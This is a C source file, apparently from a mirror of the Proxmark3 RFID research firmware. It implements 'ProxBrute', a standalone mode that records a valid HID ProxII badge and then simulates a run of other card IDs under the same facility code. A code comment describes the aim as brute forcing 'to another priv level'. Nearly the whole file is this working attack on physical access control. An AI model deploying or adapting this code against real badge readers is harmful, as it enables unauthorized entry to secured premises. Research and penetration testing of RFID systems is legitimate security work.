mirror of
https://github.com/RfidResearchGroup/proxmark3.git
synced 2024-09-20 23:36:31 +08:00
119 lines
3.5 KiB
C
119 lines
3.5 KiB
C
//-----------------------------------------------------------------------------
|
|
// Samy Kamkar, 2011, 2012
|
|
// Brad antoniewicz 2011
|
|
// Christian Herrmann, 2017
|
|
//
|
|
// This code is licensed to you under the terms of the GNU GPL, version 2 or,
|
|
// at your option, any later version. See the LICENSE.txt file for the text of
|
|
// the license.
|
|
//-----------------------------------------------------------------------------
|
|
// main code for LF aka Proxbrute by Brad antoniewicz
|
|
//-----------------------------------------------------------------------------
|
|
#include "standalone.h" // standalone definitions
|
|
#include "proxmark3_arm.h"
|
|
#include "appmain.h"
|
|
#include "fpgaloader.h"
|
|
#include "util.h"
|
|
#include "dbprint.h"
|
|
#include "ticks.h"
|
|
#include "lfops.h"
|
|
|
|
void ModInfo(void) {
|
|
DbpString(" LF HID ProxII bruteforce - aka Proxbrute (Brad Antoniewicz)");
|
|
}
|
|
|
|
// samy's sniff and repeat routine for LF
|
|
void RunMod(void) {
|
|
StandAloneMode();
|
|
Dbprintf(">> LF HID proxII bruteforce a.k.a ProxBrute Started (Brad Antoniewicz) <<");
|
|
FpgaDownloadAndGo(FPGA_BITSTREAM_LF);
|
|
|
|
uint32_t high, low;
|
|
|
|
#define STATE_READ 0
|
|
#define STATE_BRUTE 1
|
|
|
|
uint8_t state = STATE_READ;
|
|
|
|
for (;;) {
|
|
|
|
WDT_HIT();
|
|
|
|
// exit from SamyRun, send a usbcommand.
|
|
if (data_available()) break;
|
|
|
|
// Was our button held down or pressed?
|
|
int button_pressed = BUTTON_HELD(280);
|
|
if (button_pressed != BUTTON_HOLD)
|
|
continue;
|
|
|
|
// Button was held for a second, begin recording
|
|
if (state == STATE_READ) {
|
|
|
|
LEDsoff();
|
|
LED_A_ON();
|
|
WAIT_BUTTON_RELEASED();
|
|
|
|
DbpString("[=] starting recording");
|
|
|
|
// findone, high, low
|
|
lf_hid_watch(1, &high, &low);
|
|
|
|
Dbprintf("[=] recorded | %x%08x", high, low);
|
|
|
|
// got nothing. blink and loop.
|
|
if (high == 0 && low == 0) {
|
|
SpinErr(LED_A, 100, 12);
|
|
DbpString("[=] only got zeros, retry recording after click");
|
|
continue;
|
|
}
|
|
|
|
SpinErr(LED_A, 250, 2);
|
|
state = STATE_BRUTE;
|
|
continue;
|
|
|
|
} else if (state == STATE_BRUTE) {
|
|
|
|
LED_C_ON(); // Simulate
|
|
WAIT_BUTTON_RELEASED();
|
|
|
|
|
|
/*
|
|
ProxBrute - brad a. - foundstone
|
|
|
|
Following code is a trivial brute forcer once you read a valid tag
|
|
the idea is you get a valid tag, then just try and brute force to
|
|
another priv level. The problem is that it has no idea if the code
|
|
worked or not, so its a crap shoot. One option is to time how long
|
|
it takes to get a valid ID then start from scratch every time.
|
|
*/
|
|
DbpString("[=] entering ProxBrute mode");
|
|
Dbprintf("[=] simulating | %08x%08x", high, low);
|
|
|
|
for (uint16_t i = low - 1; i > 0; i--) {
|
|
|
|
if (data_available()) break;
|
|
|
|
// Was our button held down or pressed?
|
|
button_pressed = BUTTON_HELD(280);
|
|
if (button_pressed != BUTTON_HOLD) break;
|
|
|
|
Dbprintf("[=] trying Facility = %08x ID %08x", high, i);
|
|
|
|
// high, i, ledcontrol, timelimit 20000
|
|
CmdHIDsimTAGEx(0, high, i, 0, false, 20000);
|
|
|
|
SpinDelay(100);
|
|
}
|
|
|
|
state = STATE_READ;
|
|
SpinErr((LED_A | LED_C), 250, 2);
|
|
LEDsoff();
|
|
}
|
|
}
|
|
|
|
SpinErr((LED_A | LED_B | LED_C | LED_D), 250, 5);
|
|
DbpString("[=] You can take the shell back :) ...");
|
|
LEDsoff();
|
|
}
|